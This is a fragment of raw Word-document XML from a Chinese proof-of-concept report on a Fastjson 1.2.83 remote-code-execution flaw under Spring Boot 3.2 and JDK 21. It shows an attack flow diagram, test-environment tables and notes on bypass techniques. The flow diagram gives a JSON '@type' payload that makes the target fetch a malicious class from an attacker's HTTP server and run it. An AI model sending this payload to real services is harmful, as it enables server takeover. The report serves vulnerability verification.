          <w:p w14:paraId="3E072F18" w14:textId="77777777" w:rsidR="0083490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允许 JSON 数组 payload 跨阶段执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="586F5ADF" w14:textId="77777777" w:rsidTr="008349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0EBECD0" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>FD 链</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25E8D0FD" w14:textId="77777777" w:rsidR="0083490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JDK 17+ 可通过 /proc/self/fd/N 重新打开 JAR 缓存文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA64343" w14:textId="77777777" w:rsidR="0083490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绕过 ClassFormatError 对非法内部名的拦截</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42FE0ED4" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278BB17C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>2.3 攻击流程图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524AD0D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>用户输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  {"@type":"http:..17573160:6111.A"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         ▼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Fastjson </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> @type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  typeName = "http:..17573160:6111.A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         ▼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>点号替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  resource = "http://17573160:6111/A.class"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         ▼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">checkAutoType() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>资源探测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  getResourceAsStream("http://17573160:6111/A.class")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         ▼  (Spring Boot LaunchedURLClassLoader)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>目标发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>到攻击者服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>漏洞确认（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         ▼  (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>如果服务器返回带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> @JSONType </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>的恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> class)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">@JSONType </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>检测通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>早返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         │</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         ▼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">loadClass → defineClass → &lt;clinit&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>远程代码执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3C3C3C"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F9EBE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149C2C2" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>三、验证环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C136E4" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>3.1 环境角色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34902" w14:paraId="44410D6B" w14:textId="77777777" w:rsidTr="008349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06374F6" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>角色</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628AE62D" w14:textId="77777777" w:rsidR="0083490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IP 地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05AD4104" w14:textId="77777777" w:rsidR="0083490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端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A3E2CF" w14:textId="77777777" w:rsidR="0083490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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="7FD8F1D0" w14:textId="77777777" w:rsidTr="008349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EACA322" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>目标服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FFAF9FD" w14:textId="2C90334E" w:rsidR="00834902" w:rsidRDefault="00E368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****</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A551FF3" w14:textId="210C9C4E" w:rsidR="00834902" w:rsidRDefault="00E368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****</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB77A3B" w14:textId="77777777" w:rsidR="0083490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t>Fastjson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1.2.83 + Spring Boot 3.2.0 + JDK 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="3578CFD0" w14:textId="77777777" w:rsidTr="0083490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0C1A43C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>回调服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FC66C62" w14:textId="074CC83F" w:rsidR="00834902" w:rsidRDefault="00E368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****</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A38DC98" w14:textId="01F71F38" w:rsidR="00834902" w:rsidRDefault="00E368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****</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="527389C3" w14:textId="77777777" w:rsidR="0083490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 xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>回调监听（Python</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="30F1F7EA" w14:textId="77777777" w:rsidTr="008349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6C92D75" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>测试终端</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE1EBF9" w14:textId="77777777" w:rsidR="0083490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本地 Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C267CB5" w14:textId="77777777" w:rsidR="0083490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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B8B1002" w14:textId="77777777" w:rsidR="0083490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发送 PoC Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DC0A805" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FAA3C0" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>3.2 目标服务器组件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909"/>
        <w:gridCol w:w="2909"/>
      </w:tblGrid>
      <w:tr w:rsidR="00834902" w14:paraId="352142F8" w14:textId="77777777" w:rsidTr="008349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468F816" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>组件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A0216DF" w14:textId="77777777" w:rsidR="0083490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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D34294C" w14:textId="77777777" w:rsidR="0083490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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="61CAD1BA" w14:textId="77777777" w:rsidTr="008349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812EF52" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Fastjson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697404B6" w14:textId="77777777" w:rsidR="0083490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1.2.83</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E5B7D9" w14:textId="77777777" w:rsidR="0083490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漏洞版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="016B0B29" w14:textId="77777777" w:rsidTr="0083490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CDCBADE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Spring Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF99882" w14:textId="77777777" w:rsidR="0083490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3.2.0（fat-jar）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545CA677" w14:textId="77777777" w:rsidR="0083490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LaunchedURLClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="0F9676EA" w14:textId="77777777" w:rsidTr="008349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297D4E7" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>JDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15CF4D75" w14:textId="77777777" w:rsidR="0083490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21.0.11 OpenJDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDB2E92" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="008349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834902" w14:paraId="5A1E8EA4" w14:textId="77777777" w:rsidTr="0083490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A5C9EF7" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E4B26CB" w14:textId="77777777" w:rsidR="0083490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LaunchedURLClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="541C3B5F" w14:textId="77777777" w:rsidR="0083490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关键：能解析 HTTP URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="790EB4ED" w14:textId="77777777" w:rsidTr="008349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1530F54" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>AutoType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A7FFCFB" w14:textId="77777777" w:rsidR="0083490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false（默认）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B18FF81" w14:textId="77777777" w:rsidR="0083490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漏洞仍可触发</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="4796B4BD" w14:textId="77777777" w:rsidTr="0083490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43FE9B9" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>SafeMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62F64156" w14:textId="77777777" w:rsidR="0083490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未开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C3565FF" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="0083490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834902" w14:paraId="2FB43471" w14:textId="77777777" w:rsidTr="008349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BA08CF9" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594D3640" w14:textId="77777777" w:rsidR="0083490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Ubuntu 22.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02271097" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="008349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</w:tbl>
    <w:p w14:paraId="2F4CA6C0" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA5DA1C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>3.3 目标接口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34902" w14:paraId="1F684C0A" w14:textId="77777777" w:rsidTr="008349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7AD2D27" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09AA07DD" w14:textId="77777777" w:rsidR="0083490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方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFC62D4" w14:textId="77777777" w:rsidR="0083490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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
